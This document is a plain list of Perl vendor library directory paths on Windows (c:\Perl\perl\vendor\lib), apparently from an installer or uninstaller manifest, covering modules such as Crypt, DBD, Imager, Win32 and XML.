c:\Perl\perl\vendor\lib\auto\common<br />
c:\Perl\perl\vendor\lib\auto\common\sense\*<br />
c:\Perl\perl\vendor\lib\auto\common\sense<br />
c:\Perl\perl\vendor\lib\auto\Compress\*<br />
c:\Perl\perl\vendor\lib\auto\Compress<br />
c:\Perl\perl\vendor\lib\auto\Compress\Bzip2\*<br />
c:\Perl\perl\vendor\lib\auto\Compress\Bzip2<br />
c:\Perl\perl\vendor\lib\auto\Compress\Raw\*<br />
c:\Perl\perl\vendor\lib\auto\Compress\Raw<br />
c:\Perl\perl\vendor\lib\auto\Compress\Raw\Lzma\*<br />
c:\Perl\perl\vendor\lib\auto\Compress\Raw\Lzma<br />
c:\Perl\perl\vendor\lib\auto\Compress\unLZMA\*<br />
c:\Perl\perl\vendor\lib\auto\Compress\unLZMA<br />
c:\Perl\perl\vendor\lib\auto\Convert\*<br />
c:\Perl\perl\vendor\lib\auto\Convert<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASCII\*<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASCII<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASCII\Armour\*<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASCII\Armour<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASN1\*<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASN1<br />
c:\Perl\perl\vendor\lib\auto\Convert\PEM\*<br />
c:\Perl\perl\vendor\lib\auto\Convert\PEM<br />
c:\Perl\perl\vendor\lib\auto\CPAN\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Checksums\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Checksums<br />
c:\Perl\perl\vendor\lib\auto\CPAN\DistnameInfo\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\DistnameInfo<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Inject\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Inject<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Meta\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Meta<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Meta\YAML\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Meta\YAML<br />
c:\Perl\perl\vendor\lib\auto\CPAN\SQLite\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\SQLite<br />
c:\Perl\perl\vendor\lib\auto\Crypt\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Blowfish\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Blowfish<br />
c:\Perl\perl\vendor\lib\auto\Crypt\CAST5_PP\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\CAST5_PP<br />
c:\Perl\perl\vendor\lib\auto\Crypt\CBC\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\CBC<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DES\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DES<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DES_EDE3\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DES_EDE3<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DH\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DH<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DSA\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DSA<br />
c:\Perl\perl\vendor\lib\auto\Crypt\IDEA\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\IDEA<br />
c:\Perl\perl\vendor\lib\auto\Crypt\OpenPGP\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\OpenPGP<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Primes\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Primes<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Random\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Random<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Rijndael\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Rijndael<br />
c:\Perl\perl\vendor\lib\auto\Crypt\RIPEMD160\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\RIPEMD160<br />
c:\Perl\perl\vendor\lib\auto\Crypt\RSA\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\RSA<br />
c:\Perl\perl\vendor\lib\auto\Crypt\SSLeay\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\SSLeay<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Twofish\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Twofish<br />
c:\Perl\perl\vendor\lib\auto\Data\*<br />
c:\Perl\perl\vendor\lib\auto\Data<br />
c:\Perl\perl\vendor\lib\auto\Data\Buffer\*<br />
c:\Perl\perl\vendor\lib\auto\Data\Buffer<br />
c:\Perl\perl\vendor\lib\auto\Data\Compare\*<br />
c:\Perl\perl\vendor\lib\auto\Data\Compare<br />
c:\Perl\perl\vendor\lib\auto\Data\Random\*<br />
c:\Perl\perl\vendor\lib\auto\Data\Random<br />
c:\Perl\perl\vendor\lib\auto\DBD\*<br />
c:\Perl\perl\vendor\lib\auto\DBD<br />
c:\Perl\perl\vendor\lib\auto\DBD\ADO\*<br />
c:\Perl\perl\vendor\lib\auto\DBD\ADO<br />
c:\Perl\perl\vendor\lib\auto\DBD\mysql\*<br />
c:\Perl\perl\vendor\lib\auto\DBD\mysql<br />
c:\Perl\perl\vendor\lib\auto\DBD\ODBC\*<br />
c:\Perl\perl\vendor\lib\auto\DBD\ODBC<br />
c:\Perl\perl\vendor\lib\auto\DBD\Pg\*<br />
c:\Perl\perl\vendor\lib\auto\DBD\Pg<br />
c:\Perl\perl\vendor\lib\auto\DBD\SQLite\*<br />
c:\Perl\perl\vendor\lib\auto\DBD\SQLite<br />
c:\Perl\perl\vendor\lib\auto\DBI\*<br />
c:\Perl\perl\vendor\lib\auto\DBI<br />
c:\Perl\perl\vendor\lib\auto\DBIx\*<br />
c:\Perl\perl\vendor\lib\auto\DBIx<br />
c:\Perl\perl\vendor\lib\auto\DBIx\Simple\*<br />
c:\Perl\perl\vendor\lib\auto\DBIx\Simple<br />
c:\Perl\perl\vendor\lib\auto\DBM\*<br />
c:\Perl\perl\vendor\lib\auto\DBM<br />
c:\Perl\perl\vendor\lib\auto\DBM\Deep\*<br />
c:\Perl\perl\vendor\lib\auto\DBM\Deep<br />
c:\Perl\perl\vendor\lib\auto\DB_File\*<br />
c:\Perl\perl\vendor\lib\auto\DB_File<br />
c:\Perl\perl\vendor\lib\auto\Digest\*<br />
c:\Perl\perl\vendor\lib\auto\Digest<br />
c:\Perl\perl\vendor\lib\auto\Digest\BubbleBabble\*<br />
c:\Perl\perl\vendor\lib\auto\Digest\BubbleBabble<br />
c:\Perl\perl\vendor\lib\auto\Digest\HMAC\*<br />
c:\Perl\perl\vendor\lib\auto\Digest\HMAC<br />
c:\Perl\perl\vendor\lib\auto\Digest\MD2\*<br />
c:\Perl\perl\vendor\lib\auto\Digest\MD2<br />
c:\Perl\perl\vendor\lib\auto\Digest\SHA1\*<br />
c:\Perl\perl\vendor\lib\auto\Digest\SHA1<br />
c:\Perl\perl\vendor\lib\auto\FCGI\*<br />
c:\Perl\perl\vendor\lib\auto\FCGI<br />
c:\Perl\perl\vendor\lib\auto\File\*<br />
c:\Perl\perl\vendor\lib\auto\File<br />
c:\Perl\perl\vendor\lib\auto\File\chmod\*<br />
c:\Perl\perl\vendor\lib\auto\File\chmod<br />
c:\Perl\perl\vendor\lib\auto\File\Find\*<br />
c:\Perl\perl\vendor\lib\auto\File\Find<br />
c:\Perl\perl\vendor\lib\auto\File\Find\Rule\*<br />
c:\Perl\perl\vendor\lib\auto\File\Find\Rule<br />
c:\Perl\perl\vendor\lib\auto\File\HomeDir\*<br />
c:\Perl\perl\vendor\lib\auto\File\HomeDir<br />
c:\Perl\perl\vendor\lib\auto\File\pushd\*<br />
c:\Perl\perl\vendor\lib\auto\File\pushd<br />
c:\Perl\perl\vendor\lib\auto\File\Remove\*<br />
c:\Perl\perl\vendor\lib\auto\File\Remove<br />
c:\Perl\perl\vendor\lib\auto\File\ShareDir\*<br />
c:\Perl\perl\vendor\lib\auto\File\ShareDir<br />
c:\Perl\perl\vendor\lib\auto\File\Slurp\*<br />
c:\Perl\perl\vendor\lib\auto\File\Slurp<br />
c:\Perl\perl\vendor\lib\auto\File\Which\*<br />
c:\Perl\perl\vendor\lib\auto\File\Which<br />
c:\Perl\perl\vendor\lib\auto\GD\*<br />
c:\Perl\perl\vendor\lib\auto\GD<br />
c:\Perl\perl\vendor\lib\auto\HTML\*<br />
c:\Perl\perl\vendor\lib\auto\HTML<br />
c:\Perl\perl\vendor\lib\auto\HTML\Parser\*<br />
c:\Perl\perl\vendor\lib\auto\HTML\Parser<br />
c:\Perl\perl\vendor\lib\auto\HTML\Tagset\*<br />
c:\Perl\perl\vendor\lib\auto\HTML\Tagset<br />
c:\Perl\perl\vendor\lib\auto\Imager\*<br />
c:\Perl\perl\vendor\lib\auto\Imager<br />
c:\Perl\perl\vendor\lib\auto\Imager\CountColor\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\CountColor<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\GIF\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\GIF<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\ICO\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\ICO<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\JPEG\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\JPEG<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\PNG\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\PNG<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\SGI\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\SGI<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\TIFF\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\TIFF<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\DynTest\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\DynTest<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\Flines\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\Flines<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\Mandelbrot\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\Mandelbrot<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font\FT2\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font\FT2<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font\W32\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font\W32<br />
c:\Perl\perl\vendor\lib\auto\IO\*<br />
c:\Perl\perl\vendor\lib\auto\IO<br />
c:\Perl\perl\vendor\lib\auto\IO\Compress\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Compress<br />
c:\Perl\perl\vendor\lib\auto\IO\Compress\Lzma\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Compress\Lzma<br />
c:\Perl\perl\vendor\lib\auto\IO\Interactive\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Interactive<br />
c:\Perl\perl\vendor\lib\auto\IO\Socket\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Socket<br />
c:\Perl\perl\vendor\lib\auto\IO\Socket\SSL\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Socket\SSL<br />
c:\Perl\perl\vendor\lib\auto\IO\String\*<br />
c:\Perl\perl\vendor\lib\auto\IO\String<br />
c:\Perl\perl\vendor\lib\auto\IO\Stringy\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Stringy<br />
c:\Perl\perl\vendor\lib\auto\IPC\*<br />
c:\Perl\perl\vendor\lib\auto\IPC<br />
c:\Perl\perl\vendor\lib\auto\IPC\Run3\*<br />
c:\Perl\perl\vendor\lib\auto\IPC\Run3<br />
c:\Perl\perl\vendor\lib\auto\IPC\System\*<br />
c:\Perl\perl\vendor\lib\auto\IPC\System<br />
c:\Perl\perl\vendor\lib\auto\IPC\System\Simple\*<br />
c:\Perl\perl\vendor\lib\auto\IPC\System\Simple<br />
c:\Perl\perl\vendor\lib\auto\JSON\*<br />
c:\Perl\perl\vendor\lib\auto\JSON<br />
c:\Perl\perl\vendor\lib\auto\JSON\PP\*<br />
c:\Perl\perl\vendor\lib\auto\JSON\PP<br />
c:\Perl\perl\vendor\lib\auto\JSON\XS\*<br />
c:\Perl\perl\vendor\lib\auto\JSON\XS<br />
c:\Perl\perl\vendor\lib\auto\local\*<br />
c:\Perl\perl\vendor\lib\auto\local<br />
c:\Perl\perl\vendor\lib\auto\local\lib\*<br />
c:\Perl\perl\vendor\lib\auto\local\lib<br />
c:\Perl\perl\vendor\lib\auto\LWP\*<br />
c:\Perl\perl\vendor\lib\auto\LWP<br />
c:\Perl\perl\vendor\lib\auto\LWP\Online\*<br />
c:\Perl\perl\vendor\lib\auto\LWP\Online<br />
c:\Perl\perl\vendor\lib\auto\Math\*<br />
c:\Perl\perl\vendor\lib\auto\Math<br />
c:\Perl\perl\vendor\lib\auto\Math\BigInt\*<br />
c:\Perl\perl\vendor\lib\auto\Math\BigInt<br />
c:\Perl\perl\vendor\lib\auto\Math\BigInt\GMP\*<br />
c:\Perl\perl\vendor\lib\auto\Math\BigInt\GMP<br />
c:\Perl\perl\vendor\lib\auto\Math\GMP\*<br />
c:\Perl\perl\vendor\lib\auto\Math\GMP<br />
c:\Perl\perl\vendor\lib\auto\Math\MPC\*<br />
c:\Perl\perl\vendor\lib\auto\Math\MPC<br />
c:\Perl\perl\vendor\lib\auto\Math\MPFR\*<br />
c:\Perl\perl\vendor\lib\auto\Math\MPFR<br />
c:\Perl\perl\vendor\lib\auto\Math\Pari\*<br />
c:\Perl\perl\vendor\lib\auto\Math\Pari<br />
c:\Perl\perl\vendor\lib\auto\Module\*<br />
c:\Perl\perl\vendor\lib\auto\Module<br />
c:\Perl\perl\vendor\lib\auto\Module\Metadata\*<br />
c:\Perl\perl\vendor\lib\auto\Module\Metadata<br />
c:\Perl\perl\vendor\lib\auto\Module\Signature\*<br />
c:\Perl\perl\vendor\lib\auto\Module\Signature<br />
c:\Perl\perl\vendor\lib\auto\Net\*<br />
c:\Perl\perl\vendor\lib\auto\Net<br />
c:\Perl\perl\vendor\lib\auto\Net\SMTP\*<br />
c:\Perl\perl\vendor\lib\auto\Net\SMTP<br />
c:\Perl\perl\vendor\lib\auto\Net\SMTP\TLS\*<br />
c:\Perl\perl\vendor\lib\auto\Net\SMTP\TLS<br />
c:\Perl\perl\vendor\lib\auto\Net\SSH2\*<br />
c:\Perl\perl\vendor\lib\auto\Net\SSH2<br />
c:\Perl\perl\vendor\lib\auto\Net\SSLeay\*<br />
c:\Perl\perl\vendor\lib\auto\Net\SSLeay<br />
c:\Perl\perl\vendor\lib\auto\Number\*<br />
c:\Perl\perl\vendor\lib\auto\Number<br />
c:\Perl\perl\vendor\lib\auto\Number\Compare\*<br />
c:\Perl\perl\vendor\lib\auto\Number\Compare<br />
c:\Perl\perl\vendor\lib\auto\PAR\*<br />
c:\Perl\perl\vendor\lib\auto\PAR<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist\FromPPD\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist\FromPPD<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist\InstallPPD\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist\InstallPPD<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository\Client\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository\Client<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository\Query\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository\Query<br />
c:\Perl\perl\vendor\lib\auto\Params\*<br />
c:\Perl\perl\vendor\lib\auto\Params<br />
c:\Perl\perl\vendor\lib\auto\Params\Util\*<br />
c:\Perl\perl\vendor\lib\auto\Params\Util<br />
c:\Perl\perl\vendor\lib\auto\Parse\*<br />
c:\Perl\perl\vendor\lib\auto\Parse<br />
c:\Perl\perl\vendor\lib\auto\Parse\Binary\*<br />
c:\Perl\perl\vendor\lib\auto\Parse\Binary<br />
c:\Perl\perl\vendor\lib\auto\Perl\*<br />
c:\Perl\perl\vendor\lib\auto\Perl<br />
c:\Perl\perl\vendor\lib\auto\Perl\OSType\*<br />
c:\Perl\perl\vendor\lib\auto\Perl\OSType<br />
c:\Perl\perl\vendor\lib\auto\pip\*<br />
c:\Perl\perl\vendor\lib\auto\pip<br />
c:\Perl\perl\vendor\lib\auto\pler\*<br />
c:\Perl\perl\vendor\lib\auto\pler<br />
c:\Perl\perl\vendor\lib\auto\PPM\*<br />
c:\Perl\perl\vendor\lib\auto\PPM<br />
c:\Perl\perl\vendor\lib\auto\Probe\*<br />
c:\Perl\perl\vendor\lib\auto\Probe<br />
c:\Perl\perl\vendor\lib\auto\Probe\Perl\*<br />
c:\Perl\perl\vendor\lib\auto\Probe\Perl<br />
c:\Perl\perl\vendor\lib\auto\share\*<br />
c:\Perl\perl\vendor\lib\auto\share<br />
c:\Perl\perl\vendor\lib\auto\share\dist\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\bin\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\bin<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\lib\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\lib<br />
c:\Perl\perl\vendor\lib\auto\share\dist\DBD-SQLite\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\DBD-SQLite<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\subdir\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\subdir<br />
c:\Perl\perl\vendor\lib\auto\share\module\*<br />
c:\Perl\perl\vendor\lib\auto\share\module<br />
c:\Perl\perl\vendor\lib\auto\share\module\File-ShareDir\*<br />
c:\Perl\perl\vendor\lib\auto\share\module\File-ShareDir<br />
c:\Perl\perl\vendor\lib\auto\SOAP\*<br />
c:\Perl\perl\vendor\lib\auto\SOAP<br />
c:\Perl\perl\vendor\lib\auto\SOAP\Lite\*<br />
c:\Perl\perl\vendor\lib\auto\SOAP\Lite<br />
c:\Perl\perl\vendor\lib\auto\Sort\*<br />
c:\Perl\perl\vendor\lib\auto\Sort<br />
c:\Perl\perl\vendor\lib\auto\Sort\Versions\*<br />
c:\Perl\perl\vendor\lib\auto\Sort\Versions<br />
c:\Perl\perl\vendor\lib\auto\String\*<br />
c:\Perl\perl\vendor\lib\auto\String<br />
c:\Perl\perl\vendor\lib\auto\String\CRC32\*<br />
c:\Perl\perl\vendor\lib\auto\String\CRC32<br />
c:\Perl\perl\vendor\lib\auto\Sub\*<br />
c:\Perl\perl\vendor\lib\auto\Sub<br />
c:\Perl\perl\vendor\lib\auto\Sub\Uplevel\*<br />
c:\Perl\perl\vendor\lib\auto\Sub\Uplevel<br />
c:\Perl\perl\vendor\lib\auto\Task\*<br />
c:\Perl\perl\vendor\lib\auto\Task<br />
c:\Perl\perl\vendor\lib\auto\Task\Weaken\*<br />
c:\Perl\perl\vendor\lib\auto\Task\Weaken<br />
c:\Perl\perl\vendor\lib\auto\Term\*<br />
c:\Perl\perl\vendor\lib\auto\Term<br />
c:\Perl\perl\vendor\lib\auto\Term\ReadKey\*<br />
c:\Perl\perl\vendor\lib\auto\Term\ReadKey<br />
c:\Perl\perl\vendor\lib\auto\Test\*<br />
c:\Perl\perl\vendor\lib\auto\Test<br />
c:\Perl\perl\vendor\lib\auto\Test\Deep\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Deep<br />
c:\Perl\perl\vendor\lib\auto\Test\Exception\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Exception<br />
c:\Perl\perl\vendor\lib\auto\Test\Manifest\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Manifest<br />
c:\Perl\perl\vendor\lib\auto\Test\NoWarnings\*<br />
c:\Perl\perl\vendor\lib\auto\Test\NoWarnings<br />
c:\Perl\perl\vendor\lib\auto\Test\Script\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Script<br />
c:\Perl\perl\vendor\lib\auto\Test\Tester\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Tester<br />
c:\Perl\perl\vendor\lib\auto\Test\Warn\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Warn<br />
c:\Perl\perl\vendor\lib\auto\Text\*<br />
c:\Perl\perl\vendor\lib\auto\Text<br />
c:\Perl\perl\vendor\lib\auto\Text\Diff\*<br />
c:\Perl\perl\vendor\lib\auto\Text\Diff<br />
c:\Perl\perl\vendor\lib\auto\Text\Glob\*<br />
c:\Perl\perl\vendor\lib\auto\Text\Glob<br />
c:\Perl\perl\vendor\lib\auto\Tie\*<br />
c:\Perl\perl\vendor\lib\auto\Tie<br />
c:\Perl\perl\vendor\lib\auto\Tie\EncryptedHash\*<br />
c:\Perl\perl\vendor\lib\auto\Tie\EncryptedHash<br />
c:\Perl\perl\vendor\lib\auto\Tree\*<br />
c:\Perl\perl\vendor\lib\auto\Tree<br />
c:\Perl\perl\vendor\lib\auto\Tree\DAG_Node\*<br />
c:\Perl\perl\vendor\lib\auto\Tree\DAG_Node<br />
c:\Perl\perl\vendor\lib\auto\URI\*<br />
c:\Perl\perl\vendor\lib\auto\URI<br />
c:\Perl\perl\vendor\lib\auto\Version\*<br />
c:\Perl\perl\vendor\lib\auto\Version<br />
c:\Perl\perl\vendor\lib\auto\Version\Requirements\*<br />
c:\Perl\perl\vendor\lib\auto\Version\Requirements<br />
c:\Perl\perl\vendor\lib\auto\Win32\*<br />
c:\Perl\perl\vendor\lib\auto\Win32<br />
c:\Perl\perl\vendor\lib\auto\Win32\API\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\API<br />
c:\Perl\perl\vendor\lib\auto\Win32\API\Callback\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\API\Callback<br />
c:\Perl\perl\vendor\lib\auto\Win32\EventLog\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\EventLog<br />
c:\Perl\perl\vendor\lib\auto\Win32\Exe\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\Exe<br />
c:\Perl\perl\vendor\lib\auto\Win32\Exe\InsertResourceSection\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\Exe\InsertResourceSection<br />
c:\Perl\perl\vendor\lib\auto\Win32\File\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\File<br />
c:\Perl\perl\vendor\lib\auto\Win32\File\Object\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\File\Object<br />
c:\Perl\perl\vendor\lib\auto\Win32\OLE\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\OLE<br />
c:\Perl\perl\vendor\lib\auto\Win32\Process\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\Process<br />
c:\Perl\perl\vendor\lib\auto\Win32\TieRegistry\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\TieRegistry<br />
c:\Perl\perl\vendor\lib\auto\Win32\UTCFileTime\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\UTCFileTime<br />
c:\Perl\perl\vendor\lib\auto\Win32\WinError\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\WinError<br />
c:\Perl\perl\vendor\lib\auto\Win32API\*<br />
c:\Perl\perl\vendor\lib\auto\Win32API<br />
c:\Perl\perl\vendor\lib\auto\Win32API\Registry\*<br />
c:\Perl\perl\vendor\lib\auto\Win32API\Registry<br />
c:\Perl\perl\vendor\lib\auto\XML\*<br />
c:\Perl\perl\vendor\lib\auto\XML<br />
c:\Perl\perl\vendor\lib\auto\XML\LibXML\*<br />
c:\Perl\perl\vendor\lib\auto\XML\LibXML<br />
c:\Perl\perl\vendor\lib\auto\XML\LibXSLT\*<br />
c:\Perl\perl\vendor\lib\auto\XML\LibXSLT<br />
c:\Perl\perl\vendor\lib\auto\XML\NamespaceSupport\*<br />
c:\Perl\perl\vendor\lib\auto\XML\NamespaceSupport<br />
c:\Perl\perl\vendor\lib\auto\XML\Parser\*<br />
c:\Perl\perl\vendor\lib\auto\XML\Parser<br />
c:\Perl\perl\vendor\lib\auto\XML\Parser\Expat\*<br />
c:\Perl\perl\vendor\lib\auto\XML\Parser\Expat<br />
c:\Perl\perl\vendor\lib\auto\XML\SAX\*<br />
c:\Perl\perl\vendor\lib\auto\XML\SAX<br />
c:\Perl\perl\vendor\lib\auto\XML\Simple\*<br />
c:\Perl\perl\vendor\lib\auto\XML\Simple<br />
c:\Perl\perl\vendor\lib\auto\YAML\*<br />
c:\Perl\perl\vendor\lib\auto\YAML<br />
c:\Perl\perl\vendor\lib\auto\YAML\Tiny\*<br />
c:\Perl\perl\vendor\lib\auto\YAML\Tiny<br />
c:\Perl\perl\vendor\lib\BerkeleyDB\*<br />
c:\Perl\perl\vendor\lib\BerkeleyDB<br />
c:\Perl\perl\vendor\lib\Bundle\*<br />
c:\Perl\perl\vendor\lib\Bundle<br />
c:\Perl\perl\vendor\lib\Bundle\DBD\*<br />
c:\Perl\perl\vendor\lib\Bundle\DBD<br />
c:\Perl\perl\vendor\lib\Class\*<br />
c:\Perl\perl\vendor\lib\Class<br />
c:\Perl\perl\vendor\lib\Class\Inspector\*<br />
c:\Perl\perl\vendor\lib\Class\Inspector<br />
c:\Perl\perl\vendor\lib\common\*<br />
c:\Perl\perl\vendor\lib\common<br />
c:\Perl\perl\vendor\lib\Compress\*<br />
c:\Perl\perl\vendor\lib\Compress<br />
c:\Perl\perl\vendor\lib\Compress\Raw\*<br />
c:\Perl\perl\vendor\lib\Compress\Raw<br />
c:\Perl\perl\vendor\lib\Convert\*<br />
c:\Perl\perl\vendor\lib\Convert<br />
c:\Perl\perl\vendor\lib\Convert\ASCII\*<br />
c:\Perl\perl\vendor\lib\Convert\ASCII<br />
c:\Perl\perl\vendor\lib\Convert\ASN1\*<br />
c:\Perl\perl\vendor\lib\Convert\ASN1<br />
c:\Perl\perl\vendor\lib\Convert\PEM\*<br />
c:\Perl\perl\vendor\lib\Convert\PEM<br />
c:\Perl\perl\vendor\lib\CPAN\*<br />
c:\Perl\perl\vendor\lib\CPAN<br />
c:\Perl\perl\vendor\lib\CPAN\Meta\*<br />
c:\Perl\perl\vendor\lib\CPAN\Meta<br />
c:\Perl\perl\vendor\lib\CPAN\SQLite\*<br />
c:\Perl\perl\vendor\lib\CPAN\SQLite<br />
c:\Perl\perl\vendor\lib\CPAN\SQLite\DBI\*<br />
c:\Perl\perl\vendor\lib\CPAN\SQLite\DBI<br />
c:\Perl\perl\vendor\lib\Crypt\*<br />
c:\Perl\perl\vendor\lib\Crypt<br />
c:\Perl\perl\vendor\lib\Crypt\CAST5_PP\*<br />
c:\Perl\perl\vendor\lib\Crypt\CAST5_PP<br />
c:\Perl\perl\vendor\lib\Crypt\DSA\*<br />
c:\Perl\perl\vendor\lib\Crypt\DSA<br />
c:\Perl\perl\vendor\lib\Crypt\DSA\Key\*<br />
c:\Perl\perl\vendor\lib\Crypt\DSA\Key<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\*<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key\*<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key\Public\*<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key\Public<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key\Secret\*<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key\Secret<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Signature\*<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Signature<br />
